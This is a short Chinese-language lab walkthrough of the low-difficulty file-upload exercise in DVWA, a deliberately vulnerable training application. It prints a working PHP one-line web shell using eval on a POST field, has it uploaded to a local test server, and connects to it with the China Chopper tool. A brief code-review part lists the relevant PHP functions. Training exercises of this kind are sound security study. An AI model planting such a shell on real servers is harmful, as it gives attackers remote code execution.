代码审计—DWVA—File Upload—Low
0x00 前言
如饥似渴的学习ing。
你可能需要看看:
https://blog.****.net/qq_36869808/article/details/83029980
0x01 start
1.黑盒
首先我们需要制作一个php的一句话木马。
<?php @eval($_POST["dudu"])?>
然后上传。
返回一个上传路径。
127.0.0.1/DVWA-master//hackable/uploads/dudu.php
然后用菜刀连接
2.白盒
DVWA_WEB_PAGE_TO_ROOT
这里这个就是获取当前的路径。
basename
_FILES
获取文件变量。
move_uploaded_file
其实这些漏洞都需要对那个变量进行过滤才可以。